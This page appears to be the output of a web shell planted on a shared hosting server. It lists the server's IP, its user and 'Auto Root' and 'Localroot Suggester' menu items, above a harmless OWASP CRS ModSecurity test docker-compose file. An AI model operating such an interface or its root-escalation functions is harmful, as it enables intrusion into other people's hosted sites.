Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.105
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
lsws /
modsec /
OWASP3 /
tests /
Delete
Unzip
Name
Size
Permission
Date
Action
integration
[ DIR ]
drwxr-xr-x
2025-02-25 05:53
regression
[ DIR ]
drwxr-xr-x
2025-02-25 05:53
docker-compose.yml
2.32
KB
-rw-r--r--
2023-08-02 10:15
Save
Rename
version: '3.2' # Only one of these will be up at a time for now. # Concurrency will be on the tests folder we have. services: modsec2-apache: container_name: modsec2-apache image: owasp/modsecurity-crs:apache environment: SERVERNAME: modsec2-apache BACKEND: http://backend PORT: "80" MODSEC_RULE_ENGINE: DetectionOnly PARANOIA: 4 TZ: "${TZ}" ERRORLOG: "/var/log/error.log" ACCESSLOG: "/var/log/access.log" MODSEC_AUDIT_LOG_FORMAT: Native MODSEC_AUDIT_LOG_TYPE: Serial MODSEC_AUDIT_LOG: "/var/log/modsec_audit.log" MODSEC_TMP_DIR: "/tmp" MODSEC_RESP_BODY_ACCESS: "On" MODSEC_RESP_BODY_MIMETYPE: "text/plain text/html text/xml application/json" COMBINED_FILE_SIZES: "65535" CRS_ENABLE_TEST_MARKER: 1 volumes: - ./logs/modsec2-apache:/var/log:rw - ../rules:/opt/owasp-crs/rules:ro - ../crs-setup.conf.example:/etc/modsecurity.d/owasp-crs/crs-setup.conf.example entrypoint: ["/bin/sh", "-c", "/bin/cp /etc/modsecurity.d/owasp-crs/crs-setup.conf.example /etc/modsecurity.d/owasp-crs/crs-setup.conf && /docker-entrypoint.sh && apachectl -D FOREGROUND"] ports: - "80:80" depends_on: - backend modsec3-nginx: container_name: modsec3-nginx image: owasp/modsecurity-crs:nginx environment: SERVERNAME: modsec3-nginx BACKEND: http://backend PORT: "80" MODSEC_RULE_ENGINE: DetectionOnly PARANOIA: 4 TZ: "${TZ}" ERRORLOG: "/var/log/error.log" LOGLEVEL: "info" ACCESSLOG: "/var/log/access.log" MODSEC_AUDIT_LOG_FORMAT: Native MODSEC_AUDIT_LOG_TYPE: Serial MODSEC_AUDIT_LOG: "/var/log/modsec_audit.log" MODSEC_RESP_BODY_ACCESS: "On" MODSEC_RESP_BODY_MIMETYPE: "text/plain text/html text/xml application/json" COMBINED_FILE_SIZES: "65535" CRS_ENABLE_TEST_MARKER: 1 volumes: - ./logs/modsec3-nginx:/var/log:rw - ../rules:/opt/owasp-crs/rules:ro - ../crs-setup.conf.example:/etc/modsecurity.d/owasp-crs/crs-setup.conf.example command: ["nginx", "-g", "daemon off;"] ports: - "80:80" depends_on: - backend # our test originally targeted www.example.com as backend # and that would do real traffic, to a real site # backend: image: docker.io/kennethreitz/httpbin